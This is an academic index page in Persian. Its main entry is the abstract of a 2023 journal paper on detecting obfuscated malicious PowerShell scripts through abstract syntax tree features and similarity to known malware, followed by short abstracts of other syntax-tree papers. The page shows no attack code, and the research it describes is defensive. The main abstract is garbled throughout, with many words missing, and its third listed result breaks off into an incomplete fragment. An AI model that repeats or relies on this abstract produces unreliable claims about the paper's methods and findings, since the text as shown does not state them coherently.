Search for malicious powershell scripts using syntax trees
نویسندگان
چکیده
Purpose of the paper: a search for rather abstract representation PowerShell script functionality using syntax trees such that an invisible obfuscated can be detected provided associated is already known malware. Research method: obfuscation analysis performed on three types obfuscation: token, string, and tree. The obtained result: 1) we have found simple AST-based features, as number AST functions their distributed depth, well similarity distance parameter calculated from location in are sufficient to attribute scripts original script, not subject obfuscation; 2) method creating extended data set described implemented including marking source files; 3) extensive several represent structure.
منابع مشابه
More Accurate Fuzzy Text Search for Languages Using Abugida Scripts
Text search is a key step in any kind of information access. For doing it effectively, we can use knowledge about the concerned writing systems. Methods based on such knowledge can give significantly better results for searching text, at least for some languages. This can improve information retrieval in particular and information access in general. In this paper, we present a method for fuzzy ...
متن کاملClone Detection Using Abstract Syntax Trees
Existing research suggests that a considerable fraction (5-10%) of the source code of large-scale computer programs is duplicate code (“clones”). Detection and removal of such clones promises decreased software maintenance costs of possibly the same magnitude. Previous work was limited to detection of either nearmisses differing only in single lexems, or near misses only between complete functi...
متن کاملComputational Techniques for Inferring the Syntax of Un-deciphered Scripts
Understanding the syntax of an undeciphered writing is a significant challenge. This can provide important clues to the nature of writing and guide potential decipherments. Here we evaluate a set of computational tools that can help us address this problem. We show that significant aspects of the writing can be inferred through this approach without making any assumption about the underlying co...
متن کاملMerkelized Abstract Syntax Trees
In the context of modern cryptosystems, a common theme is the creation of distributed trust networks. In most of these designs, permanent storage of a contract is required. However, permanent storage can become a major performance and cost bottleneck. As a result, good code compression schemes are a key factor in scaling these contract based cryptosystems. For this project, we formalize and imp...
متن کاملCanonical Abstract Syntax Trees
This paper presents GOM, a language for describing abstract syntax trees and generating a Java implementation for those trees. GOM includes features allowing to specify and modify the interface of the data structure. These features provide in particular the capability to maintain the internal representation of data in canonical form with respect to a rewrite system. This explicitly guarantees t...
متن کاملذخیره در منابع من
با ذخیره ی این منبع در منابع من، دسترسی به آن را برای استفاده های بعدی آسان تر کنید
ژورنال
عنوان ژورنال: Bezopasnost? informacionnyh tehnologij
سال: 2023
ISSN: ['2074-7128', '2074-7136']
DOI: https://doi.org/10.26583/bit.2023.3.05